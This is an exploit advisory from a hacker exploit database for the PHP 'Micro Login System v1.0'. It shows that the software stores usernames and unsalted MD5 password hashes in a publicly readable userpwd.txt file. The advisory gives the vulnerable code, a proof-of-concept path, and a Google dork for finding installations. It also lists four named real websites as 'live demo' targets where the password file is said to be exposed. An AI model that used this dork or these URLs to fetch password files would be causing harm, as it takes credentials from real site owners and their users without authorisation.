Exploit for php platform in category web applications
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [蒸 Site : 1337day.com 0
1 [蒸 Support e-mail : submit[@]1337day.com 1
0 0
1 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 1
0 |I'm DoSs-Dz Member From Inj3ct0r Team | 1
1 +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
+---------------------------------------------------------------------------------------------------+
|-> Author: DoSs-Dz |
|-> Exploit Title : Micro Login System v 1.0 Read password :) |
|-> Vendor Site : http://www.phptoys.com/downloads/microLoginSystem.zip |
|-> version : v1.0 |
|-> Date : 18/05/12 |
|-> Google Dork : intext:"Micro Login System v 1.0" |
+---------------------------------------------------------------------------------------------------+
1) Vuln in common.php in line 26 -> 30 :
Check user existance
$pfile = fopen("userpwd.txt","a+"); <----- Creat passwd fichier :)
rewind($pfile);
If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1); <--- Hhhh Md5 :)
fwrite($pfile, "\r\n$user:$userpass"); <------ now you can see user and pass(md5) in userpwd.txt
}
2) P0c :
http://127.0.0.1/{path}/userpwd.txt (now you can see your user and pass :) )
3) Live Demo :
http://www.bryceskiteam.org/userpwd.txt
http://www.licariautobodysupply.com/pricelist/userpwd.txt
http://www.showtimeny.com/userpwd.txt
http://www.iberconnectionpt.com/userpwd.txt
+---------------------------------------------------------------------------------------------------+
|-> Spec!&l 10x 2 : Black-ID - Damane2011 - Robert Miles - BaC-Dz - Tn_Sploiter :) |
|-> Great'z : Sec4ever - is-sec.org - v4-team - vbspiders - all arab hack or security forum :) |
|-> exploit-db.com - exploit4arab.com - 1337day.com |
+---------------------------------------------------------------------------------------------------+
# 0day.today [2018-03-19] #